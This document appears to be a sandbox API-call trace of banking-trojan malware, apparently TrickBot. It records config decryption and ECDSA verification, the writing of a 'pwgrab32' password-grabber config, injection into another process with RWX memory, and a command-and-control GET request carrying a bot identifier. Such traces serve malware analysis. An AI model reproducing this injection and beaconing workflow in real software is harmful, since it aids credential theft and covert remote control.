	[0199.791] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692b30, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692b30, pdwDataLen=0x1283b0) returned 1
	[0199.791] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.791] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.791] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.791] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.791] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0199.791] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.791] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692b58
	[0199.791] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692b58, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692b58, pdwDataLen=0x1283b0) returned 1
	[0199.791] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.791] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.791] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.792] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.792] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0199.792] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.792] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692b80
	[0199.792] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692b80, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692b80, pdwDataLen=0x1283b0) returned 1
	[0199.792] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.792] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.792] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.792] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.792] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0199.792] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.792] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692ba8
	[0199.792] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692ba8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692ba8, pdwDataLen=0x1283b0) returned 1
	[0199.792] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.792] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.792] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.793] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.793] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0199.793] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.793] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692bd0
	[0199.793] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692bd0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692bd0, pdwDataLen=0x1283b0) returned 1
	[0199.793] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.793] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.793] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.793] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.793] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0199.793] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.793] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692bf8
	[0199.793] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692bf8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692bf8, pdwDataLen=0x1283b0) returned 1
	[0199.793] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.793] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.793] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.794] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.794] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0199.794] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.794] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692c20
	[0199.794] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692c20, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692c20, pdwDataLen=0x1283b0) returned 1
	[0199.794] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.794] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.794] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.794] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.794] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0199.794] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.794] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692c48
	[0199.794] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692c48, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692c48, pdwDataLen=0x1283b0) returned 1
	[0199.794] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.794] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.794] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.795] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.795] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0199.795] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.795] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692c70
	[0199.795] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692c70, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692c70, pdwDataLen=0x1283b0) returned 1
	[0199.795] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.795] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.795] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.795] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.795] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0199.795] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.795] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692c98
	[0199.795] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692c98, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692c98, pdwDataLen=0x1283b0) returned 1
	[0199.795] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.795] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.795] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.796] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.796] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0199.796] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.796] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692cc0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692cc0, pdwDataLen=0x1283b0) returned 1
	[0199.796] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.796] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.796] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.796] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.796] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0199.796] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.796] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692ce8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692ce8, pdwDataLen=0x1283b0) returned 1
	[0199.796] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.796] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.796] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.797] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.797] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0199.797] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.797] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692d10, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692d10, pdwDataLen=0x1283b0) returned 1
	[0199.797] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.797] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.797] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.797] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.797] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0199.797] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.797] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692d38, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692d38, pdwDataLen=0x1283b0) returned 1
	[0199.797] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.797] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.797] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.798] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.798] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0199.798] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.798] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692d60, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692d60, pdwDataLen=0x1283b0) returned 1
	[0199.798] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.798] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.799] CryptImportKey (in: hProv=0x225390, pbData=0x1283a4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x1283e4 | out: phKey=0x1283e4*=0x22b6600) returned 1
	[0199.799] CryptSetKeyParam (hKey=0x22b6600, dwParam=0x4, pbData=0x1283d0*=0x1, dwFlags=0x0) returned 1
	[0199.799] CryptSetKeyParam (hKey=0x22b6600, dwParam=0x1, pbData=0x2692e78, dwFlags=0x0) returned 1
	[0199.799] CryptDecrypt (in: hKey=0x22b6600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2772bb8, pdwDataLen=0x1283d8 | out: pbData=0x2772bb8, pdwDataLen=0x1283d8) returned 1
	[0199.799] CryptDestroyKey (hKey=0x22b6600) returned 1
	[0199.799] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.799] GetVersion () returned 0x1db10106
	[0199.799] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x1283e4, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x1283e4) returned 0x0
	[0199.799] BCryptImportKeyPair (in: hAlgorithm=0x22ee2a8, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0x1283ec, pbInput=0x211118, cbInput=0x68, dwFlags=0x0 | out: phKey=0x1283ec) returned 0x0
	[0199.802] BCryptGetProperty (in: hObject=0x212670, pszProperty="SignatureLength", pbOutput=0x128404, cbOutput=0x4, pcbResult=0x1283dc, dwFlags=0x0 | out: pbOutput=0x128404, pcbResult=0x1283dc) returned 0x0
	[0199.802] BCryptVerifySignature (hKey=0x212670, pPaddingInfo=0x0, pbHash=0x22a5b60, cbHash=0x30, pbSignature=0x2772eab, cbSignature=0x60, dwFlags=0x0) returned 0x0
	[0199.804] BCryptDestroyKey (in: hKey=0x212670 | out: hKey=0x212670) returned 0x0
	[0199.804] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x22ee2a8, dwFlags=0x0 | out: hAlgorithm=0x22ee2a8) returned 0x0
	[0199.804] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5b60) returned 1
	[0199.804] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32_configs\\" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32_configs")) returned 0xffffffff
	[0199.804] PathRemoveBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32_configs\\" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32_configs") returned=""
	[0199.804] CreateDirectoryW (lpPathName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32_configs" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32_configs"), lpSecurityAttributes=0x0) returned 1
	[0199.805] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32_configs" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32_configs\\") returned=""
	[0199.805] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32_configs\\dpost"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d0
	[0199.806] WriteFile (in: hFile=0x4d0, lpBuffer=0x2890c18*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x128444, lpOverlapped=0x0 | out: lpBuffer=0x2890c18*, lpNumberOfBytesWritten=0x128444*=0x3a0, lpOverlapped=0x0) returned 1
	[0199.807] CloseHandle (hObject=0x4d0) returned 1
	[0199.807] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128454 | out: lpSystemTimeAsFileTime=0x128454*(dwLowDateTime=0x6052dcc0, dwHighDateTime=0x1d50a6a)) 
	[0199.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dpost", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
	[0199.807] lstrlenA (lpString="dpost") returned 5
	[0199.807] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0199.808] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x6, lpNumberOfBytesWritten=0x127f34 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x127f34*=0x6) returned 1
	[0199.808] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x2eb, flAllocationType=0x3000, flProtect=0x40) returned 0x470000
	[0199.808] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x470000, lpBuffer=0x26ce2e8*, nSize=0x2eb, lpNumberOfBytesWritten=0x127f34 | out: lpBuffer=0x26ce2e8*, lpNumberOfBytesWritten=0x127f34*=0x2eb) returned 1
	[0199.809] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x40) returned 0x510000
	[0199.809] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x510000, lpBuffer=0x127fc0*, nSize=0x400, lpNumberOfBytesWritten=0x127f34 | out: lpBuffer=0x127fc0*, lpNumberOfBytesWritten=0x127f34*=0x400) returned 1
	[0199.809] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x40) returned 0x520000
	[0199.809] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x520000, lpBuffer=0x1283c0*, nSize=0x80, lpNumberOfBytesWritten=0x127f34 | out: lpBuffer=0x1283c0*, lpNumberOfBytesWritten=0x127f34*=0x80) returned 1
	[0199.810] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x530000
	[0199.810] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x127eb4, nSize=0x70, lpNumberOfBytesRead=0x127e94 | out: lpBuffer=0x127eb4*, lpNumberOfBytesRead=0x127e94*=0x70) returned 1
	[0199.810] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5b60
	[0199.810] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x2c, flAllocationType=0x3000, flProtect=0x40) returned 0x540000
	[0199.810] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x540000, lpBuffer=0x22a5b60*, nSize=0x2c, lpNumberOfBytesWritten=0x127e8c | out: lpBuffer=0x22a5b60*, lpNumberOfBytesWritten=0x127e8c*=0x2c) returned 1
	[0199.810] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x127eb4*, nSize=0x70, lpNumberOfBytesWritten=0x127e8c | out: lpBuffer=0x127eb4*, lpNumberOfBytesWritten=0x127e8c*=0x70) returned 1
	[0199.811] ResetEvent (hEvent=0x498) returned 1
	[0199.811] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0199.813] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x127eb4, nSize=0x70, lpNumberOfBytesRead=0x127e8c | out: lpBuffer=0x127eb4*, lpNumberOfBytesRead=0x127e8c*=0x70) returned 1
	[0199.813] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0199.813] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5b60) returned 1
	[0199.813] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x520000, lpBuffer=0x1283c0, nSize=0x80, lpNumberOfBytesRead=0x127f48 | out: lpBuffer=0x1283c0*, lpNumberOfBytesRead=0x127f48*=0x80) returned 1
	[0199.813] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x510000, lpBuffer=0x127fc0, nSize=0x400, lpNumberOfBytesRead=0x127f48 | out: lpBuffer=0x127fc0*, lpNumberOfBytesRead=0x127f48*=0x400) returned 1
	[0199.813] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x530004, lpBuffer=0x127f74, nSize=0x4, lpNumberOfBytesRead=0x127f48 | out: lpBuffer=0x127f74*, lpNumberOfBytesRead=0x127f48*=0x4) returned 1
	[0199.813] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0199.813] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x520000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0199.813] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x470000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0199.814] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0199.814] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26ce2e8) returned 1
	[0199.814] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2890c18) returned 1
	[0199.814] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x360000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0199.814] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0199.814] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2310cd0) returned 1
	[0199.814] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad348) returned 1
	[0199.814] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad348
	[0199.814] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff510
	[0199.814] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad000) returned 1
	[0199.814] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad228) returned 1
	[0199.814] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0a8) returned 1
	[0199.814] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad360) returned 1
	[0199.814] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad378) returned 1
	[0199.814] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6490) returned 1
	[0199.814] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6490
	[0199.814] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0199.814] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0199.814] WinHttpOpenRequest (hConnect=0x227d8a0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/10/62/IWNZKYJXHWGTGQGXN/1/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0199.814] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128aec, dwBufferLength=0x4) returned 1
	[0199.814] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0200.065] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0200.065] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128adc, lpdwBufferLength=0x128ad8, lpdwIndex=0x0 | out: lpBuffer=0x128adc*, lpdwBufferLength=0x128ad8*=0x4, lpdwIndex=0x0) returned 1
	[0200.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x242550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1
	[0200.065] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad360
	[0200.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x242550, cbMultiByte=-1, lpWideCharStr=0x22ad360, cchWideChar=1 | out: lpWideCharStr="") returned 1
